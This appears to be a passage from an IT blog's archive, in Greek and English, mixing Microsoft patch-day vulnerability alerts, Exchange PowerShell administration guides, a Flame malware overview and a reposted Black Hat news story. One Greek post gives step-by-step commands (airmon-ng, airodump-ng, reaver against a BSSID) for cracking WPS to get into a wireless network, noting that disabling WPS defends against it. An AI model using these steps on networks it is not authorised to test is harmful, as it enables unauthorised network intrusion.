    · For Windows XP (w/SP3)
    · For Windows XP x64 (w/SP2)
    · For Windows Server 2003 (w/SP2)
    · For Windows Server 2003 x64 (w/SP2)
    · For Windows Server 2003 Itanium (w/SP2)
    · For Windows Vista (w/SP1 or SP2)
    · For Windows Vista x64 (w/SP1 or SP2)
    · For Windows Server 2008 (w/SP2)
    · For Windows Server 2008 x64 (w/SP2)
    · For Windows Server 2008 Itanium (w/SP2)
    · For Windows 7
    · For Windows 7 x64
    · For Windows Server 2008 R2 x64
    · For Windows Server 2008 R2 Itanium
    MS11-037:
    · For Windows XP (w/SP3)
    · For Windows XP x64 (w/SP2)
    · For Windows Server 2003 (w/SP2)
    · For Windows Server 2003 x64 (w/SP2)
    · For Windows Server 2003 Itanium (w/SP2)
    · For Windows Vista (w/SP1 or SP2)
    · For Windows Vista x64 (w/SP1 or SP2)
    · For Windows Server 2008 (w/SP2) *
    · For Windows Server 2008 x64 (w/SP2) *
    · For Windows Server 2008 Itanium (w/SP2)
    · For Windows 7
    · For Windows 7 x64
    · For Windows Server 2008 R2 x64 *
    · For Windows Server 2008 R2 Itanium
    * Note: Server Core installations not affected.
    MS11-046:
    · For Windows XP (w/SP3)
    · For Windows XP x64 (w/SP2)
    · For Windows Server 2003 (w/SP2)
    · For Windows Server 2003 x64 (w/SP2)
    · For Windows Server 2003 Itanium (w/SP2)
    · For Windows Vista (w/SP1 or SP2)
    · For Windows Vista x64 (w/SP1 or SP2)
    · For Windows Server 2008 (w/SP2)
    · For Windows Server 2008 x64 (w/SP2)
    · For Windows Server 2008 Itanium (w/SP2)
    · For Windows 7
    · For Windows 7 x64
    · For Windows Server 2008 R2 x64
    · For Windows Server 2008 R2 Itanium
    MS11-047:
    · For Windows Server 2008 (w/SP2)
    · For Windows Server 2008 x64 (w/SP2)
    · For Windows Server 2008 Itanium (w/SP2)
    MS11-048:
    · For Windows Vista (w/SP1 or SP2)
    · For Windows Vista x64 (w/SP1 or SP2)
    · For Windows Server 2008 (w/SP2)
    · For Windows Server 2008 x64 (w/SP2)
    · For Windows Server 2008 Itanium (w/SP2)
    · For Windows 7
    · For Windows 7 x64
    · For Windows Server 2008 R2 x64
    · For Windows Server 2008 R2 Itanium
    MS11-051:
    · For Windows Server 2003 (w/SP2)
    · For Windows Server 2003 x64 (w/SP2)
    · For Windows Server 2008 (w/SP2)
    · For Windows Server 2008 x64 (w/SP2)
    · For Windows Server 2008 R2 x64
    Status:
    Microsoft has released patches correcting these issues.
    References:
    · Microsoft Security Bulletin MS11-037
    · Microsoft Security Bulletin MS11-038
    · Microsoft Security Bulletin MS11-039
    · Microsoft Security Bulletin MS11-041
    · Microsoft Security Bulletin MS11-042
    · Microsoft Security Bulletin MS11-043
    · Microsoft Security Bulletin MS11-044
    · Microsoft Security Bulletin MS11-046
    · Microsoft Security Bulletin MS11-047
    · Microsoft Security Bulletin MS11-048
    · Microsoft Security Bulletin MS11-051
  11. Ioannis Zontos
    · These vulnerabilities affect: All current versions of Windows and components that ship with it
    · How an attacker exploits them: Multiple vectors of attack, including sending specially crafted wireless Bluetooth traffic
    · Impact: An attacker can gain complete control of your Windows computer
    · What to do: Install the appropriate Microsoft patches immediately, or let Windows Automatic Update do it for you.
    Exposure:
    Today, Microsoft released three security bulletins describing 21 vulnerabilities that affect Windows and components that ship with it. Each vulnerability affects different versions of Windows to varying degrees. However, a remote attacker could wirelessly exploit the worst of these flaws to gain complete control of your Windows PC. The summary below lists the vulnerabilities, in order from highest to lowest severity (according to Microsoft's summary).
    · MS11-053: Bluetooth Stack Code Execution Vulnerability
    Bluetooth is an open wireless technology and standard for transmiting data over short distances.  The Bluetooth stack that ships with more recent versions of Windows suffers from a code execution vulnerability involving how it accesses memory that hasn't been deleted or initialized. By wirelessly sending a series of specially crafted Bluetooth packets, an attacker could leverage this flaw to gain complete control of your vulnerable computers. However, an attacker would need to remain in Bluetooth range to carry out this attack. The average range of Bluetooth varies from 5 to 100 meters. However, using special gear, Bluetooth "Snipers" have extended the range up to a Kilometer. This flaw only affects Windows Vista and 7.
    Microsoft rating: Critical
    · MS11-054  15 Kernel-Mode Driver Elevation of Privilege Flaws
    The kernel is the core component of any computer operating system. Windows also ships with a kernel-mode device driver (win32k.sys) which handles many kernel-level devices. This kernel-mode driver suffers from 15 elevation of privilege (EoP) vulnerabilities. The flaws all differ technically, but generally share the same scope and impact. By running a specially crafted program, a local attacker could leverage these flaws to gain complete control of your Windows computers. However, the attacker would first need to gain local access to your Windows computers using valid credentials. This factor significantly reduces the risk of this flaw.
    Microsoft rating: Important
    · MS11-056: CSRSS Local Elevation of Privilege Vulnerability
    The Client/Server Run-time SubSystem (CSRSS) is an essential Windows component responsible for console windows and creating and deleting threads. It suffers from five technically different, but functionally similar, Elevation of Privilege (EoP) vulnerabilities. Like the Kernel-Mode Driver flaw above, by running a specially crafted program, an authenticated attacker could leverage these flaws to gain complete, SYSTEM-level  control of your Windows computers. However, like before, the attacker would first need to gain local access to your Windows computers using valid credentials, which somewhat reduces the risk of these flaws.
    · Microsoft rating: Important
    Solution Path:
    Microsoft has released patches for Windows which correct all of these vulnerabilities. You should download, test, and deploy the appropriate patches throughout your network immediately. If you choose, you can also let Windows Update automatically download and install these for you.
    MS11-053:
    · For Windows Vista w/SP1
    · For Windows Vista w/SP2
    · For Windows Vista x64 w/SP1
    · For Windows Vista x64 w/SP2
    · For Windows 7
    · For Windows 7 x64
    * Note: Windows Vista SP1 is only affected if you install the optional Feature Pack for Wireless
    MS11-054:
    · For Windows XP (w/SP3)
    · For Windows XP x64 (w/SP2)
    · For Windows Server 2003 (w/SP2)
    · For Windows Server 2003 x64 (w/SP2)
    · For Windows Server 2003 Itanium (w/SP2)
    · For Windows Vista (w/SP1 or SP2)
    · For Windows Vista x64 (w/SP1 or SP2)
    · For Windows Server 2008 (w/SP2)
    · For Windows Server 2008 x64 (w/SP2)
    · For Windows Server 2008 Itanium (w/SP2)
    · For Windows 7
    · For Windows 7 x64
    · For Windows Server 2008 R2 x64
    · For Windows Server 2008 R2 Itanium
    MS11-056:
    · For Windows XP (w/SP3)
    · For Windows XP x64 (w/SP2)
    · For Windows Server 2003 (w/SP2)
    · For Windows Server 2003 x64 (w/SP2)
    · For Windows Server 2003 Itanium (w/SP2)
    · For Windows Vista (w/SP1 or SP2)
    · For Windows Vista x64 (w/SP1 or SP2)
    · For Windows Server 2008 (w/SP2)
    · For Windows Server 2008 x64 (w/SP2)
    · For Windows Server 2008 Itanium (w/SP2)
    · For Windows 7
    · For Windows 7 x64
    · For Windows Server 2008 R2 x64
    · For Windows Server 2008 R2 Itanium
    Status:
    Microsoft has released patches correcting these issues.
    References:
    · Microsoft Security Bulletin MS11-053
    · Microsoft Security Bulletin MS11-054
    · Microsoft Security Bulletin MS11-056
  12. Ioannis Zontos
    Summary:
    · These vulnerabilities affect: Most current versions of Excel, which ships with Microsoft Office
    · How an attacker exploits it: By enticing one of your users to open a malicious Excel document
    · Impact: In the worst case, an attacker executes code on your user's computer, gaining complete control of it
    · What to do: Install Microsoft Office updates as soon as possible, or let Microsoft's automatic update do it for you

    Exposure:
    As part of today's Patch Day, Microsoft released a security bulletin describing eight vulnerabilities found in Excel -- part of Microsoft Office for Windows and Mac. The flaws also affect some of the Office document viewer and converter applications
    Though the eight vulnerabilities differ technically, they share the same scope and impact. If an attacker can entice one of your users into downloading and opening a maliciously crafted Excel document, he can exploit any of these vulnerabilities to execute code on a victim's computer, usually inheriting that user's level of privileges and permissions. If your user has local administrative privileges, the attacker gains full control of the user's machine.
    Solution Path
    Microsoft has released patches for Office to correct all of these vulnerabilities. You should download, test, and deploy the appropriate patches throughout your network immediately, or let the Microsoft Automatic Update feature do it for you.
    Excel update for:
    · Office XP w/SP3
    · Office 2003 w/SP3
    · Office 2007 w/SP2
    · Office 2010 32-bit
    · Office 2010 64-bit
    · Office 2004  for Mac
    · Office 2008  for Mac
    · Office for Mac 2011
    · Open XML File Format Converter for Mac
    · Excel Viewer
    · Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats
    Status:
    Microsoft has released Office updates to fix these vulnerabilities.
    References:
    · MS Security Bulletin MS11-045
  13. Ioannis Zontos
    TOP 10: Exchange Server 2010 PowerShell Commands
    Στο παρόν post θα βρείτε εντολές που θα βοηθήσουν την διαχείριση του Mcrosoft Exchange2010 , είναι 10 βασικές εντολές που μας βοηθούν , σε άλλο post ίσως προσθέσουμε μερικές ακόμα
     
    1. Check Database Availability Group Replication Status
    Το status απο ολα τα  copies of Exchange 2010 databases. Επισης βλέπουμε το   content index state.
    Get-MailboxDatabaseCopyStatus

    2. Fix a Failed Content Index
    Οταν εχουμε failed  content index .
    Update-MailboxDatabaseCopy -Identity [id] –CatalogOnly
     
    3. Move a Mailbox in a Batch
    keep track of mailbox moves both those which are in progress and to clear them afterward.
    New-MoveRequest -Identity [id] –BatchName
     
    4. Check Move Progress
    Ολα τα  move requests και τα statistics.
    Get-MoveRequest | Get-MoveRequestStatistics
     
    4. Clear a Move Request
    In order to move a mailbox after a move request has completed or failed, you need to remove the request which can be done in bulk, individually, or by a batch name.
    Get-MoveRequest | Remove-MoveRequest
    or to remove a batch of requests already labeled...
    Get-MoveRequest -BatchName [name] | Remove-MoveRequest

    5. Determine Unified Messaging Enablement of a User
    Αν ενας user ειναι enabled για Unified Messaging,
    Get-Mailbox | fl UME*
     
    6. View Queues of all Hub Transport Servers
    Το  queue status για ολους τους  HT servers
    Get-TransportServer | Get-Queue
     
    7. Determine Active Calls on a UM Server
    see if a server is in use before performing a UM service reset or see the status of a test call.
    Get-UmServer | Get-UMActiveCalls
     
    8. Determine Exchange Server 2010 Service Status
    Βλεπουμε το status μετα απο reboot.
    Get-Service | Where {$_.DisplayName -Like "Microsoft Exchange*"}
     
    9. Get Mailbox Sizes and Sort by Size
    Get-Mailbox | Get-MailboxStatistics | where {$_.ObjectClass –eq “Mailbox”} | Sort-Object TotalItemSize –Descending | ft @{label=”User”;expression={$_.DisplayName}},@{label=”Total Size (MB)”;expression={$_.TotalItemSize.Value.ToMB()}},@{label=”Items”;expression={$_.ItemCount}},@{label=”Storage Limit”;expression={$_.StorageLimitStatus}} –auto
     
    10. Check Autodiscover Settings
    Get-WebServicesVirtualDirectory | fl InternalUrl,ExternalUrl
    Get-EcpVirtualDirectory | fl InternalUrl,ExternalUrl
    Get-OwaVirtualDirectory | fl InternalUrl,ExternalUrl
    Get-OabVirtualDirectory | fl InternalUrl,ExternalUrl
    Get-ClientAccessServer | fl AutoDiscoverServiceInternalUri
  14. Ioannis Zontos
    Σε συστήματα server SBS 2008 η SBS2011 ενδέχεται μετά από reboot να μην μπορούν να ξεκινήσουν αυτόματα κάποιες υπηρεσίες που αφορούν τον Microsoft Exchange server 2007 η τον Microsoft Exchange server 2010
    Τα services που δεν ξεκινούν είναι
    Microsoft Exchange Information Store Microsoft Exchange RPC Client Access (SBS 2011 Server Only) Microsoft Exchange Forms Based Authentication (SBS 2011 Server Only) Στο event viewer συνήθως θα δούμε κάποια η όλα από τα εξής μηνύματα
    Το Αναγνωριστικό συμβάντος: 1005
    Προέλευση: MSExchangeSA
    Κατηγορία: Γενικά
    Τύπος: σφάλμα
    Το Αναγνωριστικό συμβάντος: 2601
    Προέλευσης: MSExchange ADAccess
    Κατηγορία: Γενικά
    Τύπος: προειδοποίηση
    Το Αναγνωριστικό συμβάντος: 1121
    Προέλευση: MSExchangeIS
    Κατηγορία: Γενικά
    Τύπος: σφάλμα
    Περιγραφή: Σφάλμα 0x96e τη σύνδεση με το Microsoft Active Directory.
    Το Αναγνωριστικό συμβάντος: 5000
    Προέλευση: MSExchangeIS
    Κατηγορία: Γενικά
    Τύπος: σφάλμα
    Περιγραφή: Δεν είναι δυνατή Η προετοιμασία της υπηρεσίας Microsoft Exchange Information Store. -Σφάλμα 0x96e.
    Αν προσπαθήσουμε να τα ξεκινήσουμε manual τα τα services θα ξεκινήσουν κανονικά .Το πρόβλημα αυτό οφείλετε στο ότι στον ίδιο server SBS2008/2011 που έχουμε τον exchange server έχουμε και τον Global Catalog tou Domain μας
    Υπάρχει λύση σε αυτό πρόβλημα στο παρακάτω άρθρο
    KB article που έχει ανακοινωθεί από την ομάδα του exchange server , στο άρθρο όπως θα δείτε υπάρχουν 4 λύσεις
    Για τον sbs προτείνετε σαν best practice η 2 και η 3 , και ειδικά την δεύτερη
  15. Ioannis Zontos
    You’ve probably heard about the “Flame” worm. This interesting new piece of malware belongs to a class of attack called an Advanced Persistent Threat (APT), and it’s making headlines worldwide. As a result, many of you may be wondering whether or not this nasty sounding malware will affect your organization. My short answer is, “probably not,” but read on to learn more.
    Let’s start with the basics. Kaspersky Labs was one of the first to discover and analyze the “Flame” worm (Worm.Win32.Flame). According to their analysis so far, Flame is one of the largest and most complex malware samples they have ever seen. As such, they haven’t finished their full investigation of this malware, but here’s a quick summary of what they know so far:
    Flame is primarily an information stealing toolkit and backdoor trojan, but it also has worm-like capabilities that allows it to spread over local networks and USB storage. Its information stealing capabilities include network sniffing, keystroke logging, screenshot snapping, and even audio recording. It also can collect data about Bluetooth devices in the vicinity. It shares all this stolen data over an encrypted Command and Control (C&C) channel. It is one of the largest pieces of malware Kaspersky has seen, at around 20MB, and it contains over 20 different modules. Its author also created it using a scripting language (Lua) that malware writers don’t typically use. Rather than running as an executable file like typical malware, Flame loads itself as a number of malicious DLL files at boot. Kaspersky believes the author originally created the malware in 2010. Flame is targeted. Its infections seem limited to various organizations in Middle Eastern countries, with a primary focus on Iran. It also does not appear to have spread widely (under 400 known infections). All that said, one thing we don’t know yet is how Flame initially infects its victim. Since this is a very targeted attack, I doubt Flame’s initial infection vector is automated in any way, nor launched on a massive scale. Rather, the attackers probably directly target specific organizations, and may even leverage different infection vectors for each target. If you add up all these facts, you can probably see why many experts consider Flame an APT attack similar to Stuxnet and Duqu. While none of the researchers analyzing this malware can prove it yet, most suspect that a nation-state actor created the Flame malware for cyber-espionage.
    This brings us back to our original question, “Should I worry about the Flame malware?” Unless you’re an administrator of a state or education related industry in the Middle East, Flame will probably never directly affect you. So, no. I don’t think typical organizations have anything to worry about Flame. Furthermore, now that AV organizations have identified Flame, they have released signatures to detect and remove its known variants.
    More about Flames here
  16. Ioannis Zontos
    Ένα πολύ καλό άρθρο για τα θέματα ασφαλείας που μπορούν να επηρεάσουν την καθημερινότητα μας , για τους κινδύνους που γεννιούνται καθημερινά , είναι σίγουρα άξιο σχολιασμού , παραθέτω το άρθρο στα αγγλικά

    Las Vegas (CNN) -- If you've seen the 1983 movie "WarGames," in which a young Matthew Broderick accidentally uses computers to bring the world to the edge of "global thermonuclear war," then you have a pretty good idea what hackers and security researchers are super-concerned about these days -- in real life.
    Here at the Black Hat hacker conference at Caesars Palace, computer security experts have shown ways they can use virtual tools to tap into and tamper with all kinds of stuff in the real world, which is the gist of what made "WarGames" so scary.
    No longer limited to the digital domain, hackers -- many of them working for good -- are now targeting prison systems, the power grid and automobiles. They'll target anything with a mini-computer inside of it. These days, that's pretty much everything.
    Researcher Don Bailey pointed out that there's even a pill bottle with a cellular connection, so that it can remind its owner when to take his or her medicine.
    His first thought: "I'm not sure if that's a good idea."
    A computer worm called Stuxnet is the main reason hackers and security types are focusing on these "real-world exploits" right now. While Stuxnet isn't grabbing as many headlines these days as Anonymous and LulzSec -- two hacking groups that have been stealing personal data and taking over big-name websites -- in-the-know security experts and ex-government officials say the idea behind that worm is actually far scarier.
    "The Stuxnet attack is the Rubicon of our future," Cofer Black, the former head of the CIA's Counterterrorism Center, said during a keynote talk here.
    Stuxnet showed, for the first time, that a bit of malicious computer code could control industrial systems. The common wisdom is that the worm, which spread all over the Internet last year, was designed to attack and possibly blow up nuclear facilities in Iran.
    No one knows for sure who wrote that worm, and its powers were never put to use. But the code is out there, and security researchers and hackers are jumping at the chance to study that code and figure out what else it -- or something like it -- could do.
    The examples surfacing at Black Hat and DEF CON, a companion hacker conference attended by 15,000 people, sound like they're pulled from a Hollywood thriller.
    Tiffany Rad, a computer science professor by day, showed that a little-known electronic component in correctional facilities could be hacked and used to throw open all the doors that lock prisoners in their cells.
    "Where there exists a computer, there's still a chance of breaking that computer," said Teague Newman, who worked with Rad on the hack. The two say they have gone to the federal government with their research. They won't publish the exact code someone could use to tap into prison lock systems for fear that such an event would actually occur.
    The prison hack wasn't even that hard, they said. Working in a home basement in Virginia on a budget of $2,000, it took the duo only two hours to figure out and exploit the bug, which attacks a Siemens networking component called a programmable logic controller.
    "It was not difficult," Newman said.
    Siemens is working on a fix, but it won't necessarily come quickly.
    "We need time to go after those vulnerabilities," said a Siemens engineer who asked not to be named because he's not authorized to speak on the record. "It's not like in the IT world where you can quickly create a patch. We are really talking about critical systems here ... so if you create a patch you want to make sure the patch doesn't influence operations and the PLC (the networking component) is still running afterwards as designed."
    Rad and Newman said that company doesn't deserve all the blame. The way prison security systems are networked, and the way employees use them, are also at fault.
    Central computers that control locks should not be hooked up to the Internet, for example, but they often are, the researchers said.
    Other Black Hat speakers discussed the vulnerabilities of electrical grid and water systems, which, theoretically, could be attacked using similar methods. And further attacks focused on holes in cellular networks.
    Again, the targets are real-world, not virtual.
    Bailey of iSEC Partners demonstrated a way to hack into the mobile components on many cars to unlock or start the vehicles with a few texts from his Android phone. But breaking into cars isn't the scary part, Bailey said in an interview.
    "I could care less if I could unlock a car door," he said. "It's cool. It's sexy. But the same system is used to control phone, power, traffic systems. I think that's the real threat."
    As for solutions, Bailey said the problem is the cost and lack of regulation.
    "The issue is not just architecture but its cost," he said. "A lot of the errors and the vulnerabilities I'm seeing (are) in overall architecture. It's all systems -- whether it's your car or your tracking device or your pill bottle or whatever.
    "It's the issue of no regulations, no standards and no one enforcing any semblance of security."
    Security professionals need to step back from the technology and look at how these real-world systems -- from prisons to power plants -- are designed, said Tom Parker, vice president of security services at FusionX, a computer security company.
    "We're making the same mistakes over and over again," he said, adding that these at-risk networking components are doing more than they were designed to do.
    None of the researchers argue that society should stop putting little computers inside everything. Instead, they said, we need to work harder to make those little computers secure. And if we don't, they say, the consequences could be huge.
  17. Ioannis Zontos
    Σε αυτό το άρθρο επανέρχομαι με περισσότερες πληροφορίες για το πώς μπορούμε να βρούμε τον κωδικό και να αποκτήσουμε access σε ένα wireless lan με το reaver
    Ξεκινάμε με ένα live cd BackTrack
    Για να βρουμε το Download Live DVD from BackTrack's download page και φτιάχνουμε ένα DVD.(την ίδια δουλειά μπορούμε να κάνουμε με ένα usb >=2GB )
    Αφού έχουμε ξεκινήσει το backtrack δίνουμε
    Startx για να ξεκινήσει γραφικό περιβάλλον
    Στην συνέχεια
    Click Applications > Internet > Wicd Network Manager 2. Select your network and click Connect, enter your password if necessary, click OK, and then click Connect a second time.
    Εφόσον εχουμε internet acces δίνουμε
    Apt-get update
    Apt-get upgrade
    Apt-get install reaver

    Iwconfig για να δουμε το wireless interface

    Τώρα βάζουμε την wireless card σε monitor mode
    Airmon-ng start wlan0
    Δημιουργείτε ένα νέο interface mon0

    Ξεκινάμε το scan για να βρούμε όλα τα ασυρματα δίκτυα γύρω μας
    Airodump-ng wlan0

    Μετά ξεκινάμε το reaver
    reaver -i moninterface -b bssid –vv
    me moninterface to mon0 και BSSID αυτό που μας ενδιαφέρει πχ
    reaver -i mon0 -b 8D:AE:9D:65:1F:B2 -vv
    όταν τελειώσει το reaver θα δείτε κάτι τέτοιο

    Για να προστατευτούμε από το reaver θα πρέπει να απενεργοποιήσουμε το WPS
    Για να προστατευτούμε από το reaver θα πρέπει να απενεργοποιήσουμε το WPS
    Φυσικά δεν δουλεύει σε όλα ταAccess points και θέλει για να παίξει πολύ ισχυρό σήμα
    Περισσότερα για το reaver εδώ Sean Gallagher's excellent post on Ars Technica.
  18. Ioannis Zontos

    Mailbox Restore

    By Ioannis Zontos,

    Στο παρόν άρθρο θα ασχοληθούμε με το πώς μπορούμε να επαναφέρουμε ένα mailbox που σβήσαμε κατά λάθος χωρίς να προχωρήσουμε σε restore από backup

    Όταν σβήσουμε ένα mailbox η επαναφορά του είναι πολύ εύκολη στον Microsoft Exchange 2007/2010

    Τα Deleted mailboxes εμφανίζονται στα Recipient Configuration à disconnected mailbox , αλλά αυτό συνήθως δεν συμβαίνει αυτόματα αν ο οργανισμός είναι μεγάλος ,πρέπει να περιμένουμε να ολοκληρωθεί το online maintenance (υπαρχή δυνατότητα να τα δούμε άμεσα με power shell , οι εντολές ακλουθούν στην συνέχεια )

    Το πόσες μέρες ο exchange θα κρατά τα delete items και τα delete mailbox μπορούμε να το ορίσουμε από τον EMC

    Organization Configuration àMailbox à Database Management



    Επιλέγουμε properties και στην συνέχεια στο tab limits



    Αν θέλουμε να δούμε τα delete mail box άμεσα αν δεν είναι στα disconnect mail box πάμε στο power shell και εκτελούμε

    · Clean-MailboxDatabase \servername\SGName\Store
    καθαρίζει την Database ανά ξεχωριστό store

    · Get-Mailboxdatabase | Clean-MailboxDatabase

    · Get-Mailboxdatabase | Where{ $_.Server –eq “<servername>”}| clean-MailboxDatabase
    καθαρίζει όλες τις database στο συγκεκριμένο information store

    · Get-Mailboxdaatabase | Where{ $_.Name –eq “<DatabaseName>”}| clean-MailboxDatabase
    καθαρίζει την Database που ταιριάζει το όνομα που δώσαμε στο eq “<DatabaseName>”}|

    Όταν ολοκληρωθούν οι εντολές στον event viewer θα δούμε τα έξης events ID’s



    Event ID 9531 – η διαδικασία clean mailboxdatabase process εχει ξεκινήσει
    Event ID 9533 – αυτό το βλέπουμε όταν δεν υπάρχει ο χρήστης στοactive directory η δεν έχει ενεργοποιημένο Exchange mail. Το mailbox θα αφαιρεθεί από το mailbox store όταν ολοκληρωθεί το retention time
    Event ID 9535 – η διαδικασία ολοκληρώθηκε
    Αλλαγές μετά το Service Pack 1

    Έχουμε μετά το SP1 νέο cmdlet i

    Remove-StoreMailbox.: είναι χρήσιμη όταν έχουμε μετακίνηση πολλών mailbox και θέλουμε να έχουμε και πάλι διαθέσιμο των χώρο που καταλαμβάνουν στην source database . πχ

    · Remove-StoreMailbox -Database <DatabaseID> -Identity <MailboxID> -MailboxState [Disabled|SoftDeleted]

    Αν θέλουμε να αφαιρέσουμε το testaccount mailbox από την database DB1, όταν το μεταφέρουμε κάπου αλλού (σε άλλη database στον οργανισμό χρησιμοποιούμε )

    · Remove-StoreMailbox –database DB1 –identity testaccount –MailboxState SoftDeleted

    Η εντολή για να αφαιρέσουμε όλα τα SoftDeleted mailboxes από την database DB1 θα είναι

    · Get-MailboxStatistics -Database DB1 | where {$_.DisconnectReason -eq "SoftDeleted"} | foreach {Remove-StoreMailbox -Database $_.database -Identity $_.mailboxguid -MailboxState SoftDeleted}}

    Το νέο Remove-StoreMailbox cmdlet μας δίνει την δυνατότητα με μια εντολή να αφαιρέσουμε όλα τα disconnected mailboxes(αρκετά χρήσιμο για μεγάλους οργανισμούς )

    · Get-MailboxStatistics –Database DB1 | Where-Object {$_.DisconnectReason –eq “Disabled”} | ForEach {Remove-StoreMailbox –Database $_.database –identity $_.mailboxguid –MailboxState Disabled

    Τώρα πλέον θα δούμε τα delete mailbox στo recipient configuration àdisconnected mailbox



    Δεξι κλικ στο mailbox και επιλέγουμε connect και βλέπουμε τις εξής επιλογές για το είδος του mailbox

    User mailbox ,Room Mailbox ,Equipment Mailbox , Linked Mailbox



    Αφού επιλέξουμε το είδος του mailbox πατάμε επόμενο και βλέπουμε



    Matching user που αφορά τον χρήστη στο active directory που θα έχουμε δημιουργήσει αν έχει σβηστεί και το object του user και ταιριάζει με το mailbox που θέλουμε να κάνουμε connect(ουσιαστικά ψάχνει να κάνει match το Display Name του user )

    H άλλη μας επιλογή είναι να κάνουμε connect το σβησμένο mailbox σε κάποιον user στον οργανισμό μας που δεν έχει mailbox

    Εμείς επιλέγουμε matching user



    Επιλέγουμε ΟΚ



    Εδώ μπορούμε να επιλέξουμε και Retention policy και active sync mailbox policy αν υπάρχουν στον οργανισμό μας , και φυσικά θα βάλουμε και Alias



    Μετά next και όπως καταλαβαίνουμε είμαστε έτοιμη να επιλέξουμε το deleted mailbox να γίνει connect



    Επιλέγουμε connect



    Το σύστημα μας ενημερώνει ότι η εργασία ολοκληρώθηκε αλλά οι αλλαγές θα είναι διαθέσιμες μόλις ολοκληρωθεί το replication του Active Directory !!




     


  19. Ioannis Zontos
    Severity: High
    Summary:
    · This vulnerability affects: The DNS service that ships with the Server versions of Windows
    · How an attacker exploits it: By sending specially crafted DNS queries
    · Impact: In the worst case, an attacker gains complete control of your DNS server
    · What to do: Deploy the appropriate Windows  update immediately, or let Windows Automatic Update do it for you
    Exposure:
    The Server versions of Windows ships with a DNS Server to allow administrators to offer Domain Name System services on their networks.
    In a security bulletin released today as part of Patch Day, Microsoft describes two vulnerabilities that affects the DNS Server that ships with Server versions of Windows. While this is technically a Windows flaw, which we typically include in a combined Windows alert, we feel that it deserves individual attention due to its high severity.
    The worst of the two issues is a remote code execution flaw involving the way the DNS server handles specially crafted Naming Authority Pointer (NAPTR) DNS resource records (RR). By sending a specially crafted NAPTR query to your DNS server, and attacker could exploit this vulnerability to gain complete control of your server. However, the attacker would have to own the malicious domain name, and the authoritative DNS server for that domain name, in order for this attack to succeed. Despite this slight mitigating factor, the DNS server vulnerability poses a serious risk to your network. You should patch your Microsoft DNS servers immediately.
    The DNS Server also suffers from a less serious  Denial of Service (DoS) flaw, which an attacker could exploit to cause your DNS server to stop responding. If an attacker can prevent your users from accessing DNS services, they essentially prevent access to the Internet (by making it difficult for users to find resources by name).
    Solution Path:
    Download, test, and deploy the appropriate DNS server patches immediately, or let Windows Automatic Update do it for you.
    · For Windows Server 2003 (w/SP2)
    · For Windows Server 2003 x64 (w/SP2)
    · For Windows Server 2003 Itanium (w/SP2)
    · For Windows Server 2008 (w/SP2)
    · For Windows Server 2008 x64 (w/SP2)
    · For Windows Server R2 2008 Itanium
    Status:
    Microsoft has released patches to fix this vulnerability
    References:
    · MS Security Bulletin MS11-058
  20. Ioannis Zontos
    Summary:
    · These vulnerabilities affect: SharePoint, SharePoint Foundation, and Visio Viewer 2010, which are all part of Microsoft's Office suite of products
    · How an attacker exploits them: Multiple vectors of attack, including luring your users to a malicious web site or link, and enticing them to open malicious Visio files
    · Impact: In the worst case, an attacker can execute code, potentially gaining complete control of your computer
    · What to do: Install the appropriate SharePoint and Visio patches as soon as you can, or let Windows Update do it for you.
    Exposure:
    Yesterday, Microsoft released two Office-related security bulletins describing eight vulnerabilities found in SharePoint, SharePoint Foundation, and Visio Viewer 2010 -- all part of Microsoft's Office suite of products. Microsoft rates both bulletins as Important. We summarize the bulletins below:
    · MS12-011: Three SharePoint XSS Vulnerabilities
    SharePoint and SharePoint Foundation are Microsoft's web and document collaboration and management platforms. They both suffer from three Cross-Site Scripting vulnerabilities (XSS) that could allow an attacker to elevate his privileges. By enticing one of your users to visit a malicious web page or into clicking a specially crafted link, an attacker could exploit any of these flaws to gain that user's privilege on your SharePoint server. This means the attacker could view or change all the documents which that user could. These flaws only affect the latest 2010 version of SharePoint.
    Microsoft rating: Important.
    · MS12-015: Five Visio Viewer Memory Corruption Vulnerabilities
    Microsoft Visio is a popular diagramming program, which many network administrators use to create network diagrams. Visio Viewer is a free program that anyone can use to view those diagrams. Visio Viewer suffers from five code execution vulnerabilities, all involving the way it handles specially crafted Visio documents. Though the flaws differ technically, they share the same scope and impact. If an attacker can entice one of your users into downloading and opening a maliciously crafted Visio document, he can exploit any of these vulnerabilities to execute code on that user’s computer, inheriting that user’s level of privileges. If your user has local administrative privileges, the attacker gains full control of the user’s machine. These flaws only affect Visio Viewer 2010, not the commercial Visio product.
    Microsoft rating: Important
    Solution Path
    Microsoft has released SharePoint and SharePoint Foundation patches that correct these vulnerabilities. You should download, test, and deploy the appropriate SharePoint patches as soon as you can. If you choose, you can also let Windows Update automatically download and install these updates for you, though we recommend you test server patches before deploying them to production environments.
    The links below take you directly to the “Affected and Non-Affected Software” section for each bulletin, where you will find links for the various updates:
    · MS12-011
    MS12-015
  21. Ioannis Zontos
    These vulnerabilities affect: All versions of Microsoft’s .NET Framework How an attacker exploits it: Multiple ways, including sending specially crafted web requests or enticing users to click maliciously crafted links Impact: Various. In the worst case, an attacker can log in to your web application as another user, without having that user’s password What to do: Install the proper .NET Framework update immediately, or let Windows Update do it for you. Exposure:
    Last week — following the holiday weekend — Microsoft released a blog post and Security Advisory about a new, publicly disclosed ASP.NET Denial of Service (DoS) vulnerability.
    A few days later, they released an out-of-cycle Security Bulletin fixing that .NET Framework vulnerability, and three others. Whether you manage a public web server with ASP.NET applications, or host such .NET applications internally, we highly recommend you download, test, and deploy the appropriate .NET Framework updates as soon as possible.
     
    Microsoft’s out-of-cycle .NET Framework security bulletin describes four vulnerabilities, including the publicly disclosed DoS vulnerability mentioned above. The vulnerabilities have different scopes and impacts. I detail two of the more relevant issues below, in order of severity:
    ASP.NET Forms Authentication Bypass Flaw – ASP.NET doesn’t properly authenticate specially crafted usernames. If an attacker has (or can create) an account on your ASP.NET application, and knows the username of a victim, the attacker can send a specially crafted authentication request that gives him access to the victim’s account without needing a valid password. However, your ASP.NET web site or application is only vulnerable to this when you’ve enabled “Forms Authentication.” ASP.NET HashTable Collision DoS Vulnerability – Without going into great technical detail, ASP.NET suffers from a flaw involving the way it hashes specially crafted requests. In short, by sending specially crafted ASP.NET requests to you web application, an attacker can fill ASP.NET’s hash table with colliding hashes, which can greatly degrade the performance of your ASP.NET application or web site. If you are technically inclined, and would like more details, we recommend reading n.run’s advisory concerning this flaw. Microsoft’s bulletin also fixes a less severe privilege escalation vulnerability, as well as an insecure URL redirect flaw. For more details on these two flaws, see the “Vulnerability Information” section of Microsoft’s bulletin.
    Solution Path:
